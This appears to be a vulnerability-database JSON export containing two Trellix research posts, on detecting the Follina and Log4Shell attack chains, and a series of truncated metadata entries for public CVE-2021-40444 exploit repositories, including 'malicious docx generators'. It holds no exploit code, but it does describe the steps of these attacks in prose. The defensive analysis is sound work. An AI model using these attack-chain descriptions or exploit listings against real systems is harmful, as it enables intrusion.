yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-19T00:00:00", "description": "# Log4J and The Memory That Knew Too Much\n\nBy Trellix \u00b7 January 19, 2022\n\n_By Guilherme Venere, Ismael Valenzuela, Carlos Diaz, Cesar Vargas, Leandro Costantino, Juan Olle, Jose Luis Sanchez Martinez, AC3 Team_\n\n_Collaborators: Steve Povolny, Douglas McKee, Mark Bereza, Frederick House, Dileep Kumar Jallepalli_\n\nThere is never a dull moment in the cybersecurity industry and there is no better time than now to embrace this notion as an advantage and catalyst for business empowerment. \n\nCurrently, professionals across the globe continue to combat the latest threat facing businesses where no vertical is immune. We\u2019ve seen an increase in the analysis and patching of the Log4Shell vulnerability in the Apache Log4j Java-based logging platform for a good reason - Log4j is one of, if not the most popular logging applications used by developers. But businesses also need to think beyond patching, as we are seeing Log4Shell shift what we think of as an attack surface. \n\nThe potential for large-scale damage and this vulnerability to proliferate is high, so this impact must be taken seriously now to better plan and safeguard against the next major flaw.\n\nWhile patching is critical, it shouldn\u2019t be a static or one-time fix to ensure infrastructure security. Instead, an always-on approach combining extensive monitoring, assessment, scanning, and forensics must be implemented to provide the agility needed against today\u2019s more modern threats. \n\nSpecifically, in this post we show how an endpoint solution with performant memory scanning capabilities can effectively detect active exploitation scenarios and complement your company\u2019s network security capabilities to create a new kind of resiliency for your organization. \n\n##### Background\n\nAs those across the security industry are aware, yet another new vulnerability affecting a widely used library was released just in time for the 2021 holiday season. CVE-2021-44228 reported a vulnerability in the Log4j Java library affecting applications and web sites using the library to perform logging.\n\nThe vulnerability allowed an attacker to coerce the vulnerable site or application to load and execute a malicious Java code from an untrusted remote location. Attack vectors are varied but the most common is associated with the attacker sending crafted strings as part of a network protocol to the target machine, for example a modified HTTP Header sent as part of a POST request.\n\nThis is the reason many defenders are now focusing their efforts on detecting the malicious strings through network traffic and recognizing that proactivity is critical to drive positive results. However, network signatures can be bypassed and there are reports confirming threat actors are adapting their network attacks with various forms of obfuscation to elude network scanning. The image below shows some of the current obfuscation techniques that have been observed or reported related to this attack.\n\n \nSource: <https://github.com/mcb2Eexe/Log4j2-Obfucation> \n \n\n\nNow, this doesn\u2019t mean that network protection solutions are not useful against this attack! In fact, Log4j is proving just how critical it is for defenders to be as adaptable as attackers and enter a new era of living security \u2013 embracing a more dynamic approach and mindset. Network security platforms provide a first layer of defense and should be used as part of an embedded security architecture (security risk treatment strategy), augmented by additional layers of protection, detection, visibility, and response. \n\nModern endpoint solutions are uniquely positioned to complement network-based capabilities with in-depth, host-based visibility of system processes, such as in-memory scanning and rapid response orchestration. This combination results in a robust defense against threats like Log4Shell and allows businesses to build back confidence via end-to-end security. \n\n##### \u2018I See You\u2019: Memory Scanning #FTW\n\nMemory scanning can provide further value and help network security platforms when a connection arrives to the endpoint after defeating the obfuscation layers. The diagram below shows the execution flow for a common web-based Log4j attack.\n\n \n \n\n\nLet\u2019s outline what happens:\n\n * **Step #1:** An attacker sends a specially-crafted string to the web server hosting the vulnerable application. This string, as we see, can be obfuscated to bypass network-based signatures.\n * **Step #2:** The application proceeds to de-obfuscate this string to load it in memory. Once loaded into memory, the application initiates a LDAP connection to request the address of where the malicious class file is located.\n * **Step #3:** The attacker-controlled LDAP server responds with the location of the malicious class file by indicating the HTTP URL address of where it is hosted.\n * **Step #4:** The vulnerable application will proceed to initiate a download of the malicious class file.\n * **Step #5:** The vulnerable application will load and run the malicious class file from Step #4. At this moment, the attacker achieves code execution on the target, leaving traces that may provide visibility on this activity for the defender. This can include spawning additional processes or touching files and registry keys after an exploitation. \n\nImagine if we could outsmart the obfuscation tactics? You absolutely can \u2013 and should \u2013 to get ahead of threats like Log4j. This can be accomplished by triggering a memory scan at some point in this execution flow to detect the presence of the malicious code file. We would have a high probability to find the de-obfuscated string used within the process memory at that time. If the memory is scanned after the malicious class file is downloaded, that content would also be available for scanning in its de-obfuscated form.\n\nSuch possibilities make the memory signature performant and efficient, given the timing of the detection mainly depends on the trigger used to start the memory scan.\n\n##### Endpoint Security Expert Rules meets Memory Scan\n\nOur solution allows organizations to do just that, delivering the ability to trigger a memory scan from an Expert Rule.\n\nExpert Rules are customizable access control rules that end-users employ to detect suspicious activity not commonly seen by other scanners. We also provides community Expert Rules mapped to the MITRE ATT&amp;CK Matrix through our public GitHub.\n\nThese capabilities let us target the applications vulnerable to Log4j and identify the moment they are being exploited. Consider the following rule:\n\n \n \n\n\nHere we see a section defining ACTORS (inside the Process {\u2026} section) and TARGETS (inside the Target {\u2026} section). ACTORS are any process that may be vulnerable to the Log4j exploit. In this case, we see JAVA.EXE for standalone Java applications and TOMCAT?.EXE for Apache web-based applications. Either of these processes need to load both JAVA.DLL and JVM.DLL to ensure the Java runtime is active.\n\nThe TARGET section includes any potential payload from the attack. As Expert Rules are not focused on network traffic, we need to focus on the last step of the execution flow, which is when the payload is executed. Additional triggers like files or registry keys accessed can be added as more information about exploits become available. We can also include any exclusion of valid behavior as shown in the example above using \u201cExclude\u201d as the command line parameter. This exclusion is something customers can tailor to their environment to avoid false positives, creating better efficiencies when combating threats. \n\nThis Expert Rule will trigger when any ACTOR process spawns any of the TARGET payloads. It is important to note how certain nuances can affect outcomes and false positives. Take a look at this line at the beginning of the rule:\n\n \n \n\n\nThis instruction initiates a memory scan against the ACTOR process which caused the Expert Rule to trigger. Now we have a reliable trigger for a performant memory scan, avoiding any performance issues that could arise from a blind memory scan. A bonus is that this scan is done at a time very close to the initial exploitation attempt, which guarantees the de-obfuscated string will be in memory.\n\nNext, we scan the memory of the process which triggered the Expert Rule, executed by the AV DAT Engine. Once this string is found, detection will occur on the affected process, and the action configured in the Expert Rule REACTION line will be applied. We recommend you use the REPORT action initially until you have sorted out what processes you need to monitor.\n\n \n \n\n\nThe first event highlighted above is the Expert Rule triggering for a suspicious process spawning from JAVA.EXE, and the second shows the AV DAT detection indicating the memory of that process had signatures of the exploit.\n\n##### Note:\n\nIf the Expert Rule detection was solely present and NOT the Java Naming and Directory Interface (JNDI)/Log4j-Exploit event, it would indicate a program has executed suspicious children processes, and customers are advised to review the event and improve the Expert Rule accordingly.\n\nHowever, if both the Expert Rule and JNDI/Log4j-Exploit events are triggered for the same program, we have confidently detected the presence of the process being exploited.\n\nWe provide more information about our current coverage for Log4j vulnerability in KB95901 \u2013 coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. This article contain links to download the Expert Rule and an added updated EXTRA.DAT, as well as details on how to set up ePO to use them in your environment.\n\nIf you\u2019d like to implement this solution, we encourage you to review the instructions in the KB and associated documentation. It is highly recommended to review the Expert Rule and customize it to your environment so you\u2019re not only thwarting or responding to active risks, but also dynamically adapting to safeguard against evolving threats. \n\n##### Conclusion\n\nTo protect an environment against attacks like Log4j, a layered, embedded strategy comprised of network security coupled with targeted endpoint memory scans allows defenders to effectively detect and prevent the attack execution flow against vulnerable systems exposed via network vectors. Our ENS Expert Rules and Custom Scan reactions are designed to enable you with such capabilities so you can apply precise countermeasures against these emerging threats and gain the upper hand and more confidence to maintain and grow your business. \n", "cvss3": {}, "published": "2022-01-19T00:00:00", "type": "trellix", "title": "Log4J and The Memory That Knew Too Much", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T00:00:00", "id": "TRELLIX:908157CFA8050AA23921170E873187E1", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/log4j-and-the-memory-that-knew-too-much.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 